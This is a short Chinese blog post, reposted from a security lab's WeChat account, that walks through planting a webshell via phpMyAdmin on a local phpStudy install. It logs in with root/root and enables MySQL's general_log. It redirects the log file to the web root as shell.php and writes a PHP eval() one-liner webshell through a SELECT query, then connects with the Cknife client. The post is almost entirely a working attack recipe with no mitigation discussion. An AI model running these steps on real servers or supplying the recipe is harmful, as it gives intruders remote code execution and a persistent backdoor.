phpmyadmin getshell漏洞复现

admin 2023年6月2日22:17:27评论41 views字数 573阅读1分54秒阅读模式

漏洞环境

链接:https://pan.baidu.com/s/12vHWmcStDlgYc863ZBIktQ

提取码:c7n6

漏洞危害

Get shell

漏洞复现

环境下载完成,默认安装即可,访问phpmyadmin页面,输入root/root进入后台。

复现此漏洞的前提是general_log_file要开启,因为这个会保存所有的查询语句,默认是关闭的,执行SQL语句查看:

show variables like'general_log';

phpmyadmin getshell漏洞复现

执行SQL语句把它开启:

set global general_log=on;

phpmyadmin getshell漏洞复现

再次查看是否被开启

phpmyadmin getshell漏洞复现

已被开启,开启之后,查看网站在什么位置,设置shell路径

利用phpmyadminlog变量查找网站根目录信息

phpmyadmin getshell漏洞复现

写入shell文件

SET global general_log_file='D:/phpStudy/WWW/shell.php';

phpmyadmin getshell漏洞复现

phpmyadmin getshell漏洞复现

这时访问shell文件是什么都没有的。

phpmyadmin getshell漏洞复现

因为还没有执行查询语句所以没有记录,直接执行SQL语句

SELECT'<?php @eval($_POST["zjt"]);?>';

phpmyadmin getshell漏洞复现

再次访问shell文件就有记录了

phpmyadmin getshell漏洞复现

Shell地址http://localhost:81/shell.php

口令zjt

使用Cknife连接成功

phpmyadmin getshell漏洞复现


原文始发于微信公众号(赛瑞攻防实验室):phpmyadmin getshell漏洞复现

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月2日22:17:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  phpmyadmin getshell漏洞复现 http://cn-sec.com/archives/886855.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: